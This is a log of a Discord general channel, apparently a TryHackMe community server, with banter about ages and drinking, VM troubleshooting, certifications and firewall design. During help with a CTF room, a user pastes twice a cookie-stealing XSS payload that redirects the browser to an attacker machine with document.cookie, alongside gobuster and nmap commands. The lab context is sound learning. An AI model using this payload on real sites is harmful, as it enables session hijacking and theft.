#general
1 messages ยท Page 238 of 1
Muiri is only 22.
Just turned 23
Ok, he had a birthday.
They do tend to happen occasionally.
omg just a wee baby still then 
plenty of years left before the chronic backpain sets in
I feel ancient
Nah, after 21 they start becoming anniversaries.
I mean, at your age they're basically giving thanks for still being alive 
Gave +1 Rep to @sick lance (current: #1 - 2440)
Oi.
At your age they are celebrations of life as per your request.
Lmfao, when did you overtake James?
... Fuck I'm getting old
You got old
Wheesht
no you're not stfu
I still want the car for most rep.
James argues he was top rep for longer, but he can't drive legally.
I mean, I'm a senior pentester with a mortgage. I feel ancient 
With your eyesight can you?
Yes. ๐
Nice one 
Seรฑor Pen Tester is not an official title, Muiri
smh my head
Eh?
do you use arch btw?
Tell that to my contract 
How much was lasic in the uk? Did you have enough in your pension that month left?
Healthcare is free in the UK 
Wat?
Yes but that is less funny and lasic is elective so idk if it is free
I'm saying you're old in a convoluted way
Would anyone like rocket fuel?
It's prescribed for stuff like cataracts. Not sure if it is for elective strengthening
Oh...
I thought you had a new and original joke, my bad,
Where I live it is usually elective
It's the same old drivel.
super excited to switch to adult healthcare
Soot! Hai! 
POV: you grandkids when you talk
Yoooooo
I don't have any grand children...
How've you been?
Really? at your age? Tell your daughters to hurry up, soon enough you might not be there to meet the grandkids
You expected originality from the younger generation?
... Whose side am I on here?
I was hoping he'd have some, but no ๐ฆ
Good good, currently doing everything except for homework (Axioms are the bane of my existence)
It's like Zeeshan 2.0
oof, you should do homework
I can help you do your homework, I can mute you until it's done 
You two are surprisingly aware for your age
Oi Verum, did you finish Spider-Man
Nooooo please it is so bad and I'm copying anyways
I mean, after the work week I've had I'm honestly amazed I'm not blithering in the corner 
I don't know enough about you to make fun of you properly
See what I mean everyone? "Blithering"?
Yes yes, not every young person is a brain dead literary dunce. Some of us can still speak 
I know more than most however I am very nice so I don't share anything
๐ธ ๐ฐ ๐ฎ ๐ง ๐ฎ ๐ฉ ๐ฎ
knew somebody was gonna say it
"us"?
yh g no ๐งข
Hey, I'm in my early 20s. If I'm old then so are you ๐คทโโ๏ธ
I'm younger than you.
you're all old in my eyes
I'm in my teens
I just understood that. Just. I think
how old then?
Clearly
Why are you posting this in multiple channels?
||17||
Ouch
Look through the last half hour and take a guess
They're 19, with an emotional age of 12.
Fair enough but ouch
im younger๐
I'll give you a hint. It's less than 14
@sick lance
https://www.youtube.com/watch?v=UQe0AebpJgM is that you?
I'm not 19
I'm going to assume they're English.
well at least he asked nicely...
brits
In typical British fashion
I always laugh at this video
Scrubz is Scottish not just any common brit
His accent is significantly more annoying
And funny
Oooooooooooh, now you've done it
they all sound same for me
Nah.
"Sorry can you repeat that?"
Muiri and I sound different.
Well I'm pretty sure Muiri is American so that makes sense
Oh you dick
Scrubz you know that was very funny don't censor my free "make fun of british people" right!!!
Jesus I was scared for a second
They murdered my boy ๐ฆ
POV: You're talking to Scrubz irl
Would you still have yag powers?
No 
POV: Scrubz in church
Bold to assume I attend church...
Bold to assume he can enter a church unscathed
still recovering from that awful bus trip
More like it!
Sorry, POV: Scrubz in Phys class studying the big bang
I'd say have a drink... 
oi you!
happy with my water ๐คฃ
He's British, you can say that anyway 
didnt improve my outlook on children much
Vodka good
bad
Is such a thing possible?
I had my first taste of vodak couple weeks back, with apple
No Vodka bad Vodka Orange good
never again ty tasted like hand sanitiser
What did you mix it with?
apple juice
Sounds like what fuel would taste like
An interesting choice
Or Acetone
Pure vodka is not good
Try lemonade and orange or blackcurrent
Blackcurrant is good with vodka.
Such an adult thing to say
Hey, at least we're old enough to drink ๐คทโโ๏ธ
Yes, at least! Shh
Yes but can you ever relive the magical experience of drinking in a public park surrounded by other drunk teens trying to drown their music and not fight them without being called a pedo? I didn't think so.
mkay
Ew. Why on earth would I want to be in a park with drunk teens?
it was fairly cheap tho, so take that as you will
Sober teens are bad enough, let alone drunk ones
Fr. Get your beer and solve some tryhackme rooms
I don't mean british teens, I mean teens from.. well anywhere else
no point, no complexity no depth
you're 19?
Nah, children suck pretty much universally ๐คทโโ๏ธ
God damn Adults
no
He's 13, turning 14 soon
Well it's fun when you are, in fact, a child
With the maturity of a 12 year old
I'm 17
Yes
Nah, don't believe you
srs? whens your month?
Barely
damn professional if you want I'm a Certified Sommelier from The Court Of Master Sommelier so it's kind of my thing ๐
im older by a year ๐
I am.
Nah
i think
I mean that for you, booze is for flavour, and that kind of thing just isn't the purpose of drinking for most non adults
Oldy
wiser
Unlikely
I look like 15 y.o
POV: @sick lance looking at a spinning orb
other
ahh was gonna ask about A-levels, fair
Israel?
I finished high school
is real
Nah
Unfortunetly
Kids need education smh
cap
We don't need no education...
We don't need no thought control
I believe I was the highest ranking 14 year old on THM at some point
first if you aren't 18 or 21 depends where you live. You shouldn't be drinking at all, second don't appreciate the work of the producers and just drink alcohol to get drunk it's the best way to alcoholism and that sucks for the person and family and friends. So yes I'm all about educate people so they can enjoy alcohol and drink responsibly
I see. Your old
Is it bad I'm old enough to know the origin of these...?
that's why ppl end up with face tattoos
it either means you're old or you have good taste (koRn)
But we will we will rock you!
that is not korn... for a start
you're literally Gen Z
Positively ancient
Gen Z are still kids
experienced*
Can't I do it for fun? can't people in general drink for fun? I don't buy good Alcohol for a reason (except for single malt I adore it)
1984?
Pink Floyd lmfao
you don't need to be old, you need to have taste for good music and a bit of culture ๐
1964 more likely
i tried 
Lyrics:
You, Yes You, Stand Still Laddie!
When we grew up and went to school, there were certain teachers who would hurt the children anyway they could
by pouring their derision upon anything we did
exposing every weakness however carefully hidden by the kids.
But in the town it was well known that when they got home at night
their fat and ps...
wait you cant see everyone's age right?
koRn made a cover of it that I like
Is there an issue with openvpn again? adding the data-ciphers line fix isn't working and I can't find anything different.
it's not the original no
time to get me some AI thermal paste ๐
No but I was 12 worldwide and the other people were all oldies
cover then it is... not original... we old ppl do like original more =/
ya miss nothing
You waited in line to get the tape!
LP*
Thanks
Gave +1 Rep to @pallid lotus (current: #9 - 769)

Free rep ez
He walked straight into it 
hey guys i am having problem accessing internet with my vm
can someone help me with that
Appreciate a product is fun for me, and for many people also you don't have to break your bank to find good stuff, the problem is when the only "fun" you can get from alcohol is getting drunk, that's not a good precedent
any mods around? i wanna verify my sec+ so I can have that added to my profile
At least I can still walk straight...
Oi, @sick lance old man, you're up
LMAO
... that... doesn't mean what you think it does kiddo
blog post is getting a bit out of hand
You're right.
AI fever ๐
Dm me a screenshot without doxing you.
or can I join their server
When you realize you are not a mod anymore ๐
Nah, I love ordering them around 
No I think YOU don't knowwhat that means.
Oh, I do. You are way too young to have that particular experience though 
Hey! Treat your elders with respect!
โ Gave the role Sec+ to heapheaus
Dude, he is ancient
Muiri was one of the sane mods way back when
Okay now I give up, I am so confused.
Ainโt muiri 40 some
When?
You are so innocent 
23 ya dick 
They both are
๐
The first stage is denial..
He was a mod..
Then acceptance
he was indeed
Not so sure about the sane part

I mean, I'm not gonna dispute that bit
Or was that James? I'm not sure which one, but I was terrified of one of them
kekw
You should have been terrified of both of us smh
james is cool
Lemme check
It was fun when they switched.
I once got muted for a week by one of them
James is, and always has been, a total straight shooter, He just doesn't put up with BS.
Me? I like playing games 
told you - not sane at all
It was Hydra.
I'm glad you rickrolled James
Hydra is chill
You know James is one of the only people who has rickrolled me, right?
Hydra is our new lead mentor,
Fuck me
Because you are his only frend?
James is great too.
No, thank you
Gave +1 Rep to @jade ocean (current: #75 - 85)
dammit
Probably a good decision that 
Damn top 75
I am so good
I have!
Damn Robocop lol
Oh man...
When @night prairie put a rick roll in his CV and sent it to recruiters 
Still counts up.
Wait genuine question, are you James?
Nah
like I always say, I'm probably the oldest here ๐
Lol seriously?
James is English
blasphemy
Muiri I need to tell you a story and it'll probably be a long one. You see, on my way back from home right, I drive past this random abandonned warehouse and as I drive past it, in the door I see a man trying to... Read more
Not pedantic enough
NT
How dumb do you think I am? 
You brits are all the same
Indeed
How long have you been lurking?
Luckily discord has my back
Please god not long please
You actually clicked it? 
#general message
ahh dammit
Since when does Discord support expanding long messages lmfao
If you upload a file it does
I don't think answering that is very smart long term.
๐
But not with that prompt
Stop judging me
It'd be a good update tho
Nah, I don't want to read essays... 
I did ๐
it's like Beetlejuice people said his name too many times ๐ ๐
Bahahahahhaha, yeah, I remember that.
(as example,)
Tbf, you were really unlucky there
||Never gonna give you up||
in other news, signed up for CCNA
feel like my networking skills have been slacking way to much
having finished A-levels, got around 3 months of free time
Nice! Go Jayy!
Congrats
HAPPY MIDSUMMER
Happy weekend
Hi .....someone plz help me with kali linux not opening in full screen mode in vbox ๐ฅฒ
Do you mean that when you fullscreen the window it doesn't resize the guest?
Yep. Just go to view > auto resize guest display
plpease i need help
make sure you have the guest additions installed.
I believe so yes.
i preety sure there is issue in the Room
I just install from ISO. Haven't used the prebuilt VM in a while.
Investigate the log file.
What is the destination address of packet 63?
please any help
Tried all of that .... isn't working
Anyone play Phasmaphobia here?
Iโve had that happen before
Yes ....my old kali machine works fine in full screen.....this new one isn't working ....
Usually Kali downloads the guest additions as itโs downloading.
What did u do?
I clicked the expand button
Then it fit the whole screen
It starts off not but when you minimize and then expand it should fit
Atleast for me that worked
Tried that too ๐ญ
this is the second time this happened today with me
You might have to reinstall Kali
Do the process over again
Or
This is the 4th time I reinstalled ๐ฅฒ
You can try to manually download the guest additions if you donโt have that downloaded already

what is actually happening?
Kali isnโt full screen
vbox?
Idk
Yes
you need to insert the cd with utils
Already did
so you got the mount show up?
isn't there an open-vm-tools package for vmware? i remember that i wasn't able to insert guest additions bc of some error
Yes
oh vbox mb
I reinstalled 4 times
Black_kat
Go into settings
And look at I think it says drives or somthing
It shows disks
Does it say guest additions?
and you need add user into vb group
i first faced this back in backtrack days. i was not so old that time. and here we are still strugling with the same issue.
times don't change at all isnt it
do torrent file. is better
just get the ovm lol
There's another option?
parrot is great
Or you donโt
Hm
I just deleted the whole machine in frustration!! I need to add again first to check:')
get the ovm
Also maybe follow a video. I first tried downloading Kali on my own and Idk what the hell I did but I totally broke it.
tbh its not that hard. just read everything carefully
Thatโs the thing lol
Iโve sped through it
sometimes patience is the key
Absolutely
Can I somehow clone a fresh copy of my another kali machine?:')
I should make a video on installing Kali in vbox. 
I've only done it 100+ times.. so not an expert. lol
100 times is still a lot
hyper v had made everything so simple. atleast those who get the pro.
i would say your experience is still around beginner in that case.
kek
you should be able to copy the directory containing the .vdi and .vbox files and add somewhere else
Vmware can clone machines, don't know about Vbox
vbox need some extra steps
You can clone machines in VBox too.
those who are struggling with vbox i have something for you guys
||just get arch๐ ||
Don't need an exact clone though!! Like a fresh clone .....with only the basic settings 
That would be default Kali no?
dl the Kali VM then.
ezpz
There are extra setup steps you have to do if you install from ISO.
U're not getting my point .....just with the full screen feature 
I
iirc the VirtualBox Kali VM comes with everythig pre-baked into it for VirtualBox..
why arch?
Yes it does
Down to the tools too
That would include everything you need for VBox and should include ability to fullscreen etc.
Tomato
๐ฅ ...
yaa that's the last plan..
if VB canrun hannah montana linux, it can run all
FreeBSD?
โIM INโ as the camera pans to my Hannah Montana Linux terminal
true true
having trouble at the first question lol
Yay Google CTF, les go
im deleting my kali. installing montana linux.
anyone here who did searchlight?
if you find .iso... go ahead
Dissing Hannah Montana Linux is punishable by death
Hold your tongue
๐นlol
Cmon I prefer my Kali ngl
does this have the songs playing on repeat and you can't even reduce the volume if you wanted to?
if yes then im installing it
U just committed a crime 
funniest storyline ever
A very simple and generic question i am using x32/64dbg debugger and i am very happy with it but its only for windows any good debugger for Linux applications?

lmao
GDB maybe?
something with ui and easy to use?
its good option but its not open source you need to pay
have you looked at edb-debugger?
I didn't realize you wanted open source
perfect its pretty interesting and has similarities with olly and xdbg for windows nice i will take a closer look
great to hear, man, good luck!
where to go after web exploits basics if your into web hacking?
Portswigger, thm has a few owasp rooms.
And some web app rooms.
highly doubt it
There is something coming soon ๐
Scrubz, why is my progress role stuck at 0x2 
like a web course?
does it update once in X hours?
or you mean a room
No, from my understanding it's a path.
so an extension to the web basics one
No, a new one.
DID YOU PINGU ME?!
i got it figured out
it was supposed to be sl{ready} and i put sl{yeah}
try verifying again it should fix
The TryHackMe Discord Server
that worked, thanks, I forgot that /verify was a thing
Gave +1 Rep to @errant fossil (current: #637 - 6)
yw, lol yeah its very rarely used
Has any other EU person experienced an influx on 451 responses lately? (Cannot access for legal reasons, EU law and GDPR)
did a fresh install of kali yesterday on vmware...and copy-paste worked out of the box ๐คฏ
A few times, but not very much
Awsome
not really but probably dependant on what site you are going to
I have a gobuster question for anyone who may know the answer. I was trying to do a room and was getting no where with either gobuster or dirb. I finally got really frustrated and looked at the beginning of a writeup and found that the results they were getting with gobuster where completely different than what I was getting. The commands and word lists were the exact same. The results they were getting that I wasn't was numbers for directory names (eg. 10.10.10.10/2) Directory may be the wrong term the proper name escapes me right now. I hope this makes sense.
check you are using the right ip
US sites?
Yeah
had a few
As far as I am aware I am.
whats infosec?
information security
if it helps the room was Valley
oooh for the number part.... yeah you need to specify the sub dir for that to work
is it a course/job?
Information security is very broad
Anything information that has security goes under that title
it is a field of knowledge
Information security, sometimes shortened to infosec, is the practice of protecting information by mitigating information risks. It is part of information risk management. It typically involves preventing or reducing the probability of unauthorized or inappropriate access to data or the unlawful use, disclosure, disruption, deletion, corruption,...
I don't believe there was a sub directory to use. The command coppied from the writeup is sudo gobuster -u http://<ip> -w /opt/wordlists/directory-list-2.3-medium.txt now that I am looking at it again there was one difference in this command to the one I used. I didn't use sudo. but other that that it was the same
Oh That makes sense, Thanks for the info @shut hawk @crude stump
Gave +1 Rep to @shut hawk (current: #14 - 536)
Most Ruby projects use Bundler now days (see https://bundler.io), which will install gem dependencies from a Gemfile (just lists the gem and version requirements) or a Gemfile.lock file (lists specific versions that must be installed). If a Gemfile.lock doesn't exist, bundle install will generate one based on the versions it installed. Bundler ensures that all versions are compatible with all version requirements. Bundler can also be included into Ruby scripts (see bundler/inline) which will attempt to auto-install dependencies when you run the script. If you want to install a fully isolated environment (aka don't install gems globally) run bundle install --path vendor/bundle (the old way) or bundle install --standalone (installs everything into ./bundle). Fun Fact: Bundler actually inspired Python's Pipfile and Rust's Cargo.toml file. (PS: no an AI didn't write this, I just know how to Ruby real good.)
Dang
Yo random question but if u have time can someone pls try and find me one of those world maps that have the flags in the countries with ocean terrain? If u find one dm me pls :3
@carmine bough
What should I do for dinner?
funnily enough I have this image stored locally
Cajun.. ๐
ยฏ_(ใ)_/ยฏ
We talking a boil? or we talking gumbo?
Yes

Do a boil and get gumbo.
Place I get my boil at doesn't have gumbo. I sadge
I had :usa with chili and cheese for lunch. lol
just tickles me that :usa brings up ๐ญ
Nothing wrong with vegan food.. but I like meat.
When I think southern, I don't think vegan, I think seafood, and meat
Same
I think I'm gonna go fish this evening.. catch me some trout and put em on the smoker this weekend.
WTF Uber.....?
I search Gumbo.... and Staples pops up
Could go to my favorite food truck, but it is rush hour
lol. Just gonna do some shore fishing at the lake.. if I go at all.. that's a long walk. Couple hundred feet...
Oh no! Not a couple hundred of feet! Whatever shall you do?!
woah now.. that's way too real. The hill is all grass. ๐คฃ
lol i dont think ive seen the light of day in the last year
I know! 
comp sci has taken my soul
@gray sonnet has forced me to be an inside beerrise. Nothing but HTB and THM
machines are life. I think back to the matrix movies and im thinking i wouldnt mind being in that pod
Totally don't have https://open.spotify.com/track/3ZzxtumoIENCi16HAKuiLU?si=a1c8617cae574bfd on repeat
where can i find windows 11 arm iso for mac vm's
The Windows Insider Program I believe
You may want to ensure you can actually run the iso though. https://support.microsoft.com/en-us/windows/options-for-using-windows-11-with-mac-computers-with-apple-m1-m2-and-m3-chips-cd15fd62-9b34-4b78-b0bc-121baa3c568c
d
?
just checking if I had sub role for fun
How hard is it to study for CCNA assuming the student is a determined nerd?
I didn't take the exam, this was also the old CCNA but my networking class in school was basically CCNA prep. Class only met once a week for 3 hours and I think I did an hour or two of prep work for each session. Semester was 15? weeks and I was able to pass the courses final exam and the Cisco prep exams.
Anecdotal, maybe it will give you an idea though.
Keep in mind the CCNA now is different than it was then
My company IT department wants to isolate RnD entirely because they don't have the capacity to help us grow
I'm considering the possibility of isolating them as well, basically putting up a secpnd wall from the inside
I.e. I don't want to be hit by random scans or whatever they fancy
If they wanna lock me inside, I want to lock them out too if at all feasible
Still can't decide what I want for dinner
Cereal
thm page or room page ?
@sand trench report ๐ ...
shadow is better
on that grind lol
what is she at?
around 1k or so
Thank you so much, Amazing way to end the night
Gave +1 Rep to @boreal scarab (current: #30 - 268)
for example the http port is open when i connect http://ip/ it never loads
you use thm vpn file?
i mean. you are connected with thm vpn? and no other vpn is active
yup
and when i ping the machine
the machine seems ok
what is your MTU ? if know how to check it
how can i check it
do ifconfig and on the interace you use is shown here
yea
sounds like a vpn issue, or it wants a hostname
maybe
mtu is known to cause issues though
@loud marlin
how can i resolve it
i don't even use the kali machine because of this problem
Lets run some trouble shooting. Can you ping it?
yeah i can ping the machine
if it's mtu, there should be a faq somewhere on how to resolve vpn issues
i can do anything exepct connecting to http server
which room?
can you run ping 10.10.10.10 -c 3 and what is respond ?
[Day 18] ELF JS advent of cybersec 2019
Couple more. Is the http server on 80 or another port?
Also, did you sudo nano /etc/hosts and add the IP and roomnamehere.thm ?
that'll generally be indicated in the task, or it'll be an obvious hint
If it's on another port than 80, you need to specify:
IP:OtherPort
Or
RoomNameHere.thm:OtherPort
the problem is that the rooms do not have thm is then it's just and ip adress instead of a domain name like http://10.10.10
still the same problem
Yah, in /etc/hosts that's where you specify roomnamehere.thm
i can the web page http://10.10.10.10 of thm that i'm connecting secssfully but i can't ping 10.10.10.10
I'll use HTB names as I've been doing a lot
10.10.10.10 mailing.htb
In /etc/hosts
how about this one http://10.10.56.122:3000/home
man I only got a 10 day streak
In /etc/hosts or in your browser?
in my browser
i can't connect to this site
are you on the vpn?
Lemme see, try what Hydra suggested, I'll fire up that room and see
nvm just read that you can ping it
is this the only machine that's giving you trouble like this?
can you join any voice romm i can share screen
no every one that contain an http page
Can I get some help with W1seguy room
Yah
do the command and do you have 0% packet lost or 100% lost ?
ping -c 3 10.10.10.10
sudo namp -vv -sV -p- IPHERE
so 0% lost or 100% lost as result ?
i think 0
it need to ping 3 time and in text you get in terminal needs to tell of packet lost
0 packet loss
and it pinged 3 times
and i can see the flag when i visit http://10.10.10.10
if you do that ifconfig what is mtu as i show up example ?
1500
can you send picture. jsut hide the details such as ip and so
๐ญ I messed up my DNS records and instead of pointing a subdomain to that, it instead pointed the main domain
I only realised like 2 weeks later
hi
Challenge Link: https://tryhackme.com/room/25daysofchristmas Day OneโโโInventory Management: The first part of the Christmas 2019 challenge on TryHackMe is a web application thatโs vulnerable to cookie hijacking. The challenge comes with a Google Doc which covers the basics of how websites are run and how cookies work. If youโre struggling, I wo...
Thx
Gave +1 Rep to @slow helm (current: #858 - 4)
just read this part and you will understand me @boreal scarab
lol so did they get rickrolled
I wonder if I should buy a serious domain name.. lol
Amazon Route 53 has cheap ones
</p><script>window.location = 'http://<local-machine-ip>/page?param=' + document.cookie </script><p>
get some memish one to make le funny emails
I have a few already.. lol
neg. could doxx me. lol
not like you couldn't already find out all my info from what is currently known.. but why make it easier. ๐คฃ
cool email
Don't say you're the one emailing me from a rick roll domain
i feel u
No. I don't do anything with them right now. lol
/p><script>window.location = 'http://<local-machine-ip>/page?param=' + document.cookie </script><p>
Whois protection?
pay 1.4k$ and get it removed
with the local ip machine
๐
In place.. but there are other ways. ๐ฆ
is it really 1.4?
mad
If you're they desperate to find out their name by all means...
Ok
atp just repurchase the domain off a diff registrar and pretend like u didnt own it before
ez
I own securegateway.link 
sounds very secure
Right?
per year? or one time pay?
Year
Yeah for securegateway 100% worth it
I also own studythe.cloud which is going to be a learning portal for some courses I'm working on
Just need to find a proper backend or write one, whichever makes most sense
that sounds cool, What kind of courses or is it a suprise reveal?
Python introductory and advanced course and maybe some general stuff about DevOps
I'm considering making the first half or 75% of the python intro course free and the rest of it like $5. Potentially $5 or $10 for the advanced one
Not sure yet... The advanced would go through the design and implementation process of something big.. Possibly a C2 framework because #haccerr
Having a stroke?
it is from old movie
@shell nova Got him all sorted, I ended up just being the test dumby, he told me what he wanted me to do.
dhrck ?
But did fix it SOMEWHAT. Page still wouldn't load, but his VPN was having issues before
the truffle shuffle... Goonies.. lol
Thats awsome, let me know when your done, would love to purchase
aaaand it is sleep to the sloop from the beep to the boop while meep moop
It's what I will spend my summer holidays on, but whether a month is enough I'm not sure.. ๐
Otherwise give me a follow on twitter. Knowing me, I will 1000% spam my feed when things are online
shoot for the stars, aim for the moon
100% whats the acc
wait a second, aren't domains 12$ for a year
haven't seen 5$ domains
Some are, like the com tld
.click is $3 even
sure thing, i followed
.xyz can be less than that ๐คทโโ๏ธ
Depends on a large number of factors
TLD, domain length / popularity, etc
Yea
Registrar too, to some extent
Muiri help me settle a debate with myself
I got some of mine for $0.99
Outbound rules are less important in an isolated subnet than inbound and in fact outbound could just be "allow from internal to any"
Yay or nay
I'd say depends on the purpose of the subnet, but I'd lean towards nay, personally ๐คทโโ๏ธ
They may be more open than inbound but still require consideration
Depends on what the subnet is used for imo
Could do anything from allowlist only -> allow common ports -> allow common ports + others
On a home network? DNS and it's ports if you want to shove everything through something like pihole
Hypothetically speaking let's say it's a development team of 50 people
Oh, this is from earlier
M- maybe ๐
I've got a locked down subnet on my home network where only connections to a single IP address and port are allowed, mainly because I'm paranoid, but that's all that it really needs
Well, now I'm curious about the context 
This
Reference for others
Company IT team can't support the next few years, they suggest a DMZ
I mean, realistically speaking, block everything, allow port 3128 to squid for outbound HTTPS + DNS connections, and leave it at that. Assuming they've got CI/CD sorted for deployment, they're unlikely to need anything else
If they do need anything else, it can be raised as and when encountered
Outbound?
Aye. Do they need more more than HTTPS for research?
Inbound is fine. I'm only wondering about outbound
Assuming they're not trying to manually deploy anything
My hypothesis is that "from any to any" is fine
Potentially SSH and whatever things like npm use to install packages
I mean, chances of it causing an issue are slim. I just tend to default to "security over anything else" 
Git youkno
Or rather, default to security, then consider usability as needed
NPM is HTTPS
Do they have a local git server or is it SAAS?
Did you just assume there's no cloud? What are you, from the 90's?

80
Okay, let me rephrase. By "local" I mean something managed by the company lmao
I don't care where it is 
Fair ๐
Not sure
Probably
But cloud too
I mean, either way, same solution tbh.
Deploy some form of proxy if that isn't already in place. Allow that 443/TCP and 53/UDP access outbound to anywhere. Block all outbound from the isolated subnet except to port 3128/TCP / 8080/TCP / whatever the proxy runs on. If SSH is required for git ops, allow SSH specifically to that server
I'm just wondering, realistically speaking and without wearing tinfoil hats, what could happen from allowing "any any" outbound to the Internet? Sure, once you're hacked and such... But... Assuming that doesn't happen (
)
Realistically? Probably nothing ๐คทโโ๏ธ
It's disaster planning, pure and simple
Something you're glad for if you do get hacked, or if some insider threat shows up, or whatever, but otherwise just sits there and does nothing
F Billy... Always causing trouble that guy
What, watching the wire to gmail, encrypted with TLSv1.3 using perfect forward security? 
Then again, watch as Joe from accounting uses the same password for everything and it shows up in HIBP

TL;DR: Defence in Depth ftw
If it's simple to implement then just sits there in the background without requiring ongoing maintenance, why not do it?
Hmm I guess
Just makes my life that much harder because now I need to hunt down ip ranges to whitelist...
I mean, I see no reason why it wouldn't be a thing? SMTPS is just TLS wrapped around SMTP right?
I mean the hypothetical person doing this hypothetical thing
Why whitelist IP ranges?
I thought you just recommended against any any
Or was that through proxy you meant?
Assuming the IT department has stateful firewalls
Smh my head

Yeah, I would block any:any, allow access only to a proxy (which has decent logging, can be configured for DPI, has allowlists, can be free, etc, etc), then leave the firewall alone
Use the proxy to configure which domains can be accessed
https://youtube.com/shorts/h28bZjCR_5M?si=3b43--HYPqaBwcYy
Ah yes... AI Pin. Totally not a security risk. Nope, not at all.
OPNSense ftw!
Love that project so much
And then configure anything that needs to speak to the outside world to use that proxy?
Pretty much, yep. I assume the dev environment is connected up to AD?
Need to read up on that I guess
Of some variety, I'm including Entra ID in there
Nop
Why
AD would make that rollout incredibly simple.
GPO to set the proxy settings on everything at once, then hook the proxy auth up into AD with either LDAP or preferably Kerberos. Would be completely seamless and take about 5 minutes
Ah, then yes
That said, for this situation proxy authentication is probably overkill anyway tbh
My head hurts reading this 

Kek
Yee, Entra ID is just renamed Azure AD
I feel depressed that I know what he's talking about and what that means in terms of what I need to suggest to have done
Such pain
Such exhaustion
Much drink
If it helps, I feel depressed that I know what I'm talking about 
Given your age you're a huge nerd
When do you move to Denmark so I can have you hired to my team?
HUH??

I showed a colleague my home network a couple of months ago. Gave them a hell of a headache 
Just mention STIGs
Eh, just Ansible it for Linux ๐คทโโ๏ธ
Could do that for Windows as well, tbf, but might as well just use AD if it's in place already
"You like your windows environment don't you? You wouldn't want me to bring STIGs into this, would you?"
IaC is beautiful I will hear nothing bad about it
My local guy has a default response to anything I ask about "that's very complicated, it will take at least a full week"
I wanted to know which policies were applied to an OU
Oooh such long task
Under promise, over deliver. I like it
Automation is beautiful, I will hear nothing bad about it
That's what the planning phase is for!
I feel that
See? You fit right in, in my team
Idea takes 5 minutes. Implementation 1 day. Approval stamps 3 months.
Tbf, Terraform is so much better for that than ansible
This is what leads to scope creep and people over promising

If you want to feel bad for someone... I've got an intern coming in next week lmao
Terraform planning phase
Sensei Muiri
Too many planners, not enough wrench turners

Terraform plan before terraform apply
I'm reliably told the answer to that is OpenTofu
Which I instinctively like more than Terraform from the name alone 

Disclaimer: I hate k8s
God, don't talk to me about Kubernetes... I started learning with K3s recently
My head hurts
Just... Don't

We have infrastructure as code... as code...
Like literally just don't
But I wanna upgrade my home deployments
Your life is much more fulfilled without the unnecessary complexity of kubernetes
Nop, he's stuck in the rabbit hole guys. It's too late
Nah, seriously, I test Kubernetes enough that I reckon it's worth learning to dev on them
Fair
I know the security flaws to look out for in a kubernetes cluster, but I never feel completely happy testing something unless I can pull it to bits and put it back together again from scratch
Oh please don't

I never could get into NixOS
It looks cool tbh
I'll do you one better... mine's in a local git server running in the corner of my office 
It's the ADD of Linux distros
... complete with self-hosted CI/CD runners
The "ooh, shiny" distro
I need to send you a picture
Well I can post it here I guess
Funny you should say this actually... I was looking into OpenStack yesterday...
Yeah, that was the conclusion I drew as well unfortunately
Yessssssss, love me some consoles
Raspberry Pi 5 with 7" touch screen showing self-stats on grafana
Nice ๐
This was before I got a fan btw so it's a little bit warm... 
(70 Celsius)
Ah wait there's a C... I'm too tired
Didn't see
๐๐
Last question before I head to bed
Should I include a "Biohazard" warning sign inside the DMZ bubble as a joke or is that too much?

Aight
Back at uni we had some custom police tape on the glass wall of the lab
๐๐
Can't remember exactly the wording but it was along the lines of "Don't knock on the glass, hackers scare easily"
If you can get something like that, I recommend it 
Obligatory @flint sluice shoutout
i got a couple of horrible prod stories for you
Story time? ๐ฟ
Hey does anyone know of any rooms that go over headless browser automation/implementations? Like Selenium/Puppeteer?
they are not for public consumption
Well I never got a reply from those jobs, so I assume so ๐ญ
It was also the website I included in my university application (I got a blog on there), the course lead mentioned he found it funny, I don't think he believed me when I said it was unintentional
lol that's awesome
God I hate people.
Walking on a street, and the street is pretty bright. 2 cars, one going one way, and one going the other. Car facing me had his highbeams on, when car going away was going past, high beams went off. After the car passed, guy turned them on and blinded me. Threw up my hands like WTF, and flipped them off. No apology, no nothing.
buy a freight train horn
and then once someone does something similar you give them a traumatizing event from the suddon loud noise
similar
fr
Like how to troll people with dynamic content generation via their own news feed using marketing implementations on social media kind not for public consumption?
more like war stories that get traded behind closed doors
Aww ๐ฆ
I suspect I can guess...
So I spent most of today reading ISO 29100 it's interesting
โค๏ธ metasploit
Is this the room with pdf's in the box?
Ok
I do not know the time
does anyone know how to make a charaacter ai of sorts using a chatgpt api in python
๐ฅณ
WOOOOOO
AceS, you got any recommended mods for watch dogs
What is watch dogs?
how tf am i supose to grow my server when i cant even get reach?
a game where you basically watch dogs for a living
Shiiii thatโs the thing. I play on PlayStation
ewww
๐คฃ
Bruh
You watch cute doggos for a living? ๐
PlayStation is lit
mods really do make Watch dogs better
nah its overratred tbh
did too much research on it
PC >

